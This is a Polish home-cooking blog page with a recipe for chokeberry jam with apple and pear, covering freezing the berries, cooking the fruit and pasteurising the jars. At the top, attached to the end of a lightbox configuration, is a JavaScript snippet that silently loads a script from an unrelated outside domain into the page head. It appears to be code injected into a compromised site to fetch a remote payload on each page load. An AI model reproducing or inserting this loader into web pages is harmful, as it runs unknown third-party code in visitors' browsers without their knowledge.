, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Dżem aroniowy z jabłkiem i gruszką

Wydrukuj artykuł Wydrukuj artykuł

Dżem aroniowy z jabłkiem i gruszką

Zaczęło się od tego, że dostałam w prezencie 1 kg oczyszczonej, świeżej aronii. Babci Iwonce serdecznie dziękujemy!

Przeglądając Internet w poszukiwaniu inspiracji, natknęłam się na kilka ciekawych przepisów i wskazówek odnośnie kulinarnego wykorzystywania aronii. W rezultacie postanowiłam zrobić dżem. A przygotowałam go tak:

Składniki:

  • 1 kg aronii
  • 1 kg jabłek
  • 1 kg gruszek
  • 2/3 kg cukru

W pierwszej kolejności włożyłam aronię do zamrażarki. Znawcy tematu mówią, że aronię należy przemrozić, by pozbyć się jej nadmiernej cierpkości. Następnego dnia przygotowałam jabłka i gruszki. Umyte, obrałam usunęłam gniazda nasienne i pokroiłam w małe kawałki. Włożyłam do garnka zasypałam połową cukru i na małym ogniu podgrzewałam około 40 min., często mieszając. Na głęboką patelnię teflonową wrzuciłam zamrożoną aronię i zasypałam drugą połową cukru – podgrzewałam również około 40 min. Na początku zrobiło się dużo soku na patelni. Połowę przelałam więc do jabłek i gruszek. A potem na patelni zrobiło się zbyt mało płynu, a w garnku zbyt dużo, więc przelałam nieco soku z garnka na patelnię z aronią. Zależało mi na tym by nie dolewać wody, chciałam otrzymać możliwie gęsty dżem. Później gdy aronia zamieniła się w malutkie twarde kuleczki połączyłam je z jabłkami i gruszkami. Podgrzewałam całość jeszcze tak długo, by jabłka i gruszki całkiem się rozpadły.

Słoiki na dżem dokładnie sparzyłam. Napełniłam je pozostawiając 2 cm od górnej krawędzi słoika. Po napełnieniu pasteryzowałam* przez około 30 minut.

*Instrukcja dot. pasteryzacji dżemu:

Do dużego garnka włożyć na dno drewnianą kratkę lub czystą ściereczkę. Ustawić słoiki, tak by zostało między nimi około 2 cm przestrzeni. Zalać zimną wodą do 2/3 wysokości słoików. Przykryć garnek i rozpocząć podgrzewanie. Od momentu zagotowania należy utrzymać wodę w stanie delikatnego wrzenia, na możliwie najmniejszym ogniu przez około 20-30 minut. Po zakończeniu pasteryzowania wyjąć słoiki i odstawić do wystygnięcia.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony